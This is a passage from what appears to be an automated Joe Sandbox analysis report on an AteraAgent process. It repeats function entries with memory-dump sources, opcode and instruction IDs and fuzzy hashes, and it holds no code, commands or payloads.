                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15212672B0DA098FE758AB6CA8421B973D1EFC6365B44027FE14DC32B2DD15B80A47C5
                                                                                                                                                                                                                                                                            Function 00007FFAAB46EAE5 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 8h5
                                                                                                                                                                                                                                                                            • API String ID: 0-2314399704
                                                                                                                                                                                                                                                                            • Opcode ID: a0be51db5e04a47a9ac18b7b2a87c3f5e41ef1110a2251825f5367496d447ed8
                                                                                                                                                                                                                                                                            • Instruction ID: ce4df74c43caad0e063fcf6b1e3ac2adbe8c3270caf00068c0853ece17741a2e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0be51db5e04a47a9ac18b7b2a87c3f5e41ef1110a2251825f5367496d447ed8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8219EB191DA89CFE799DB68C8656A9BBF1FF56341F0001BAE04DC21A2DE341946CB81
                                                                                                                                                                                                                                                                            Function 00007FFAAB47412C Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: r63
                                                                                                                                                                                                                                                                            • API String ID: 0-1294201789
                                                                                                                                                                                                                                                                            • Opcode ID: b234d207b78113b6d000b3243afce8c664b71cad0c9fc420f9ccd7e7a1ef0045
                                                                                                                                                                                                                                                                            • Instruction ID: 29829d4d2fac34b593e56554d27f64a41417eb8bc6b68191eb9f825a6720108b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b234d207b78113b6d000b3243afce8c664b71cad0c9fc420f9ccd7e7a1ef0045
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5F0E262959B898FF775966884663F93BE1FB92380F0041B6904DD3192ED28198EC7C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB474190 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: }5
                                                                                                                                                                                                                                                                            • API String ID: 0-112390451
                                                                                                                                                                                                                                                                            • Opcode ID: b08d623b0ccf2c0f4d5f4f0930b9163e715686301956e995715b650616a566e2
                                                                                                                                                                                                                                                                            • Instruction ID: 6cfb76b1212a54712045ac99b2d2913cbb39b949d1b70fac113a9886be7efec0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b08d623b0ccf2c0f4d5f4f0930b9163e715686301956e995715b650616a566e2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BE01A71A145198BE768EBA8C8447BCA3A1FB58350F10017A900ED3292CE3459428B80
                                                                                                                                                                                                                                                                            Function 00007FFAAB46A7FA Relevance: .5, Instructions: 479COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 805525c4280403d5168d4cf0c404994eb6b80be532f151a26bb270d27123d379
                                                                                                                                                                                                                                                                            • Instruction ID: c85b1fc729c43734c9d86fdee6fbb1060d1bef03c012961433f0a7177c42b928
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 805525c4280403d5168d4cf0c404994eb6b80be532f151a26bb270d27123d379
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BD1DA57A0EFC15BF21563ACE8661FDBFA1EF822A5B1C45FBD14C860A7D809580E42D2
                                                                                                                                                                                                                                                                            Function 00007FFAAB46D9E9 Relevance: .4, Instructions: 439COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c9d131e59318684621342d463b5dc582dcc0f82f36a134f88407f0c2cd8752b0
                                                                                                                                                                                                                                                                            • Instruction ID: 37e61bc48602d297ab8e784e8952b9d47a5a2eb36d01becf93f878e3aeefd09b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9d131e59318684621342d463b5dc582dcc0f82f36a134f88407f0c2cd8752b0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BD1457160DF4D8FDB58DB18D851AA5F7E1EFA6350F04427ED04DC32A2DE26A84AC782
                                                                                                                                                                                                                                                                            Function 00007FFAAB469FD0 Relevance: .4, Instructions: 439COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 8894810c67f34d5101002720fb350644b20f59ed3f7a39014d81e18c8a349a05
                                                                                                                                                                                                                                                                            • Instruction ID: 8715563ff81ce8b41170a37ec144e7bad6d12e8b320d2765dff888d919561f3e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8894810c67f34d5101002720fb350644b20f59ed3f7a39014d81e18c8a349a05
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FC16C52B1EA854FF39597BC98556743BD2EF96280B1841FAE04CC72E7DD189C0A83D1
                                                                                                                                                                                                                                                                            Function 00007FFAAB480291 Relevance: .4, Instructions: 435COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 911c29e774f4a7cefb148d26b19b4e5f27b97c66b82b932d4fff03f29d540ed9
                                                                                                                                                                                                                                                                            • Instruction ID: 021656f42b3293c313b864f2cac8bef7773529ecb24e9b720d000d434f9b3be0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 911c29e774f4a7cefb148d26b19b4e5f27b97c66b82b932d4fff03f29d540ed9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43D13871A2DA898FEB95D76CC4916B97FE1EF96390B0441BAD04DC73A3CD246C0683C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB47C998 Relevance: .4, Instructions: 428COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 723bda88fb55f1d0040816652e488b25fca360e17e276d2077e97eb5cfec37f0
                                                                                                                                                                                                                                                                            • Instruction ID: ea134ed501cb0421ba2fb8ccfa8a808c295e07aa808637b561ce22d649e24216
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 723bda88fb55f1d0040816652e488b25fca360e17e276d2077e97eb5cfec37f0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71D1C230A1DB858FEBA8DB2CC45577977D1FF9A340F10457DE08EC32A2DE64A8458782
                                                                                                                                                                                                                                                                            Function 00007FFAAB47C950 Relevance: .4, Instructions: 410COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7192ec85503eb61ebc1d401f382d724a485575291ef8a7c5fc25eed3e81d3456
                                                                                                                                                                                                                                                                            • Instruction ID: cab38995cad904ce3ac70e92e3639a14fbfe3198aa6ee440f4c6b27c230a6aed
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7192ec85503eb61ebc1d401f382d724a485575291ef8a7c5fc25eed3e81d3456
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9C10730A1DB488FDB54EF6C98455B97BE1EF9A340B0441BAE44EC72A3DE24EC4587C2
                                                                                                                                                                                                                                                                            Function 00007FFAAB47549D Relevance: .4, Instructions: 407COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: cebebef55fc523363beced0b51b350e25cbccf595a877a5395d31e9ba0456af5
                                                                                                                                                                                                                                                                            • Instruction ID: b373d84eddaa2ff3762672017db63c6df5884c3994feada6ce31ebc32058e5a2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cebebef55fc523363beced0b51b350e25cbccf595a877a5395d31e9ba0456af5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34A10C63A0FB864FF755A36CA8655F57BD0EF532A570842B7D04DCE0A3D805588B83D1
                                                                                                                                                                                                                                                                            Function 00007FFAAB4733B8 Relevance: .4, Instructions: 388COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5625312bbb72f2e32b7836e21a33a7676f95d932659393714f7b9ae0b979fa43
                                                                                                                                                                                                                                                                            • Instruction ID: 596a7da3357c907b978fc37e19eace0fc2389f4d6773d7c94b081da0d1e2463f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5625312bbb72f2e32b7836e21a33a7676f95d932659393714f7b9ae0b979fa43
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19C10362A0EBC69FE756A7ACD8651F83FE0FF56250B0840F7D048DB0A3D919584AC3D2
                                                                                                                                                                                                                                                                            Function 00007FFAAB4733D7 Relevance: .4, Instructions: 378COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f99ed297177bca6424011a883554e5ac59245e70f583a0b35a2c94747cc0ee7c
                                                                                                                                                                                                                                                                            • Instruction ID: a7a1a167543831d734819c944963b607d666ca92a11c1143e76fb766210a8fb2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f99ed297177bca6424011a883554e5ac59245e70f583a0b35a2c94747cc0ee7c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90C10362A0EBC59FE756A7ACD8651F83FE0FF56250B0840F7D048DB0A7D915584AC3D2
                                                                                                                                                                                                                                                                            Function 00007FFAAB4733E2 Relevance: .4, Instructions: 377COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 71d21183eb200aaf97981063c8499b30232e4e36559f93a3150df9fa32b6f0cb
                                                                                                                                                                                                                                                                            • Instruction ID: d8f91441cbd0ba573aeb728f5182db8d765347a085a4034d5b748912efcf7951
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71d21183eb200aaf97981063c8499b30232e4e36559f93a3150df9fa32b6f0cb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4C10262A0EBC69FE756A7ACD8651F83FE0FF56250B0840F6D048DB0A7D925584AC3D2
                                                                                                                                                                                                                                                                            Function 00007FFAAB48639B Relevance: .4, Instructions: 374COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 94a9bc51c776e8ed89f788cb701456c0030468fefab134c8ac35d526bb99da25
                                                                                                                                                                                                                                                                            • Instruction ID: fcf8edf5107f897a217b2a271c9d797206137366f60d8b44eb5cee5248796fd8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94a9bc51c776e8ed89f788cb701456c0030468fefab134c8ac35d526bb99da25
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAC1E33091D6928BF36C9B58D451679B7E0EF46704F14847DD4DFC72A2CA38B84A8792
                                                                                                                                                                                                                                                                            Function 00007FFAAB47E31D Relevance: .4, Instructions: 365COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1047f23d5f27cdc10e9c56b30a000d47920c26c4daec8119585c469b993538d3
                                                                                                                                                                                                                                                                            • Instruction ID: 4c36a4f5cd422b00690dbe06724228aa7bd529642fd859e981d111ab79a13409
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1047f23d5f27cdc10e9c56b30a000d47920c26c4daec8119585c469b993538d3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B841352260E7C69FE356E76C98A54A83FA4EF53250B0842F7D48CCB0B3D908684DC3A1
                                                                                                                                                                                                                                                                            Function 00007FFAAB46B900 Relevance: .4, Instructions: 363COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1d555e54de1e90dee0b61c60423900a30911df7e12e989768a40950aaa4509f4
                                                                                                                                                                                                                                                                            • Instruction ID: 30265dbe4e2fec4a12edf870bc85961ebde972795a8fc5d4e5989a5626a471be
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d555e54de1e90dee0b61c60423900a30911df7e12e989768a40950aaa4509f4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EB16B2160DB494FDB95E76CD851AB577E1FF96350B0482FAD08DC72E7CA18A84AC381
                                                                                                                                                                                                                                                                            Function 00007FFAAB47E35D Relevance: .4, Instructions: 359COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 2555f2302b53f8bdc3a9f17dc1d4d728b333cab687ea22aa9b674192e9963676
                                                                                                                                                                                                                                                                            • Instruction ID: c081659f96d3a13e0e44b61faaeaef9a4a3fe1ff0c2ac7a4db3c7228f8878a5e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2555f2302b53f8bdc3a9f17dc1d4d728b333cab687ea22aa9b674192e9963676
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C341272260E7C69FE356E76C9CA54A47FA5EF57250B0842F7D48CCB0B3D908684DC3A1
                                                                                                                                                                                                                                                                            Function 00007FFAAB47C990 Relevance: .4, Instructions: 352COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ba745f6c26bf74a6125129ddf594d0c294a74ec4be7881a66f85c8dfc5b0eb8d
                                                                                                                                                                                                                                                                            • Instruction ID: 8b82bf7513000325f83a00ac6a635e328de244d567d21fe5e90efcc0a4a17b78
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba745f6c26bf74a6125129ddf594d0c294a74ec4be7881a66f85c8dfc5b0eb8d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3A1D671A1CB488FEB58DB5C98466B977E1FF9A350F04017EE04EC32A2DA65F84587C2
                                                                                                                                                                                                                                                                            Function 00007FFAAB473BF8 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: eac62051b49c98bdd240e7b463610d6cdf92118b74d44412935aa54aa1390c2c
                                                                                                                                                                                                                                                                            • Instruction ID: 21b7d07da8138d7ab36cc9f7afde0fd2611c24084a12781951f7fef30a281f23
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eac62051b49c98bdd240e7b463610d6cdf92118b74d44412935aa54aa1390c2c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84A1043061DF498FE759DB2CC490A7177E1EF56350B1445BDD08ECB2A2CA25F88ACB81
                                                                                                                                                                                                                                                                            Function 00007FFAAB47C938 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: a30222c5ab7c311750ebb34e2c3bab4769122fbdb6530417f8757bff31ed9485
                                                                                                                                                                                                                                                                            • Instruction ID: b332b0d2f68c5ce03d85fe285c3e55bc980fa8dfcf018b1d347d99bc8531cdfa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a30222c5ab7c311750ebb34e2c3bab4769122fbdb6530417f8757bff31ed9485
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8B10431A0EF8A8BEF94DB58D4516B937E1EF99350F05853AD45DC32A2CE68E84687C0
                                                                                                                                                                                                                                                                            Function 00007FFAAB46634D Relevance: .3, Instructions: 338COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: a8be47a05c0a6852d3a4c6390676e3bf1ef16d8d5b520578f34092d1bf10cea9
                                                                                                                                                                                                                                                                            • Instruction ID: 02b8695024e50825cb8e3214a4378838859adce59272055fb7a661b4bd5681a1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8be47a05c0a6852d3a4c6390676e3bf1ef16d8d5b520578f34092d1bf10cea9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2C15E70D0A659CFEB99DB2884647E8BBB1EF56340F5480BEC00DD7292CA356989CB91
                                                                                                                                                                                                                                                                            Function 00007FFAAB4673E1 Relevance: .3, Instructions: 324COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6035b2217e0e3c2d8e6ff17a09c37cf4aad6454d1b7b9c2f0bbdc19355fddd48
                                                                                                                                                                                                                                                                            • Instruction ID: 222943e8006fa1ab617b930a849e488f7edf1b03dbf3312a9441a9fe030d28a7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6035b2217e0e3c2d8e6ff17a09c37cf4aad6454d1b7b9c2f0bbdc19355fddd48
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77C1FF70D0961DCFDB95DF68C494BADBBB2FF5A340F1441A9D00DE72A2CA34A985CB50
                                                                                                                                                                                                                                                                            Function 00007FFAAB484FFB Relevance: .3, Instructions: 319COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
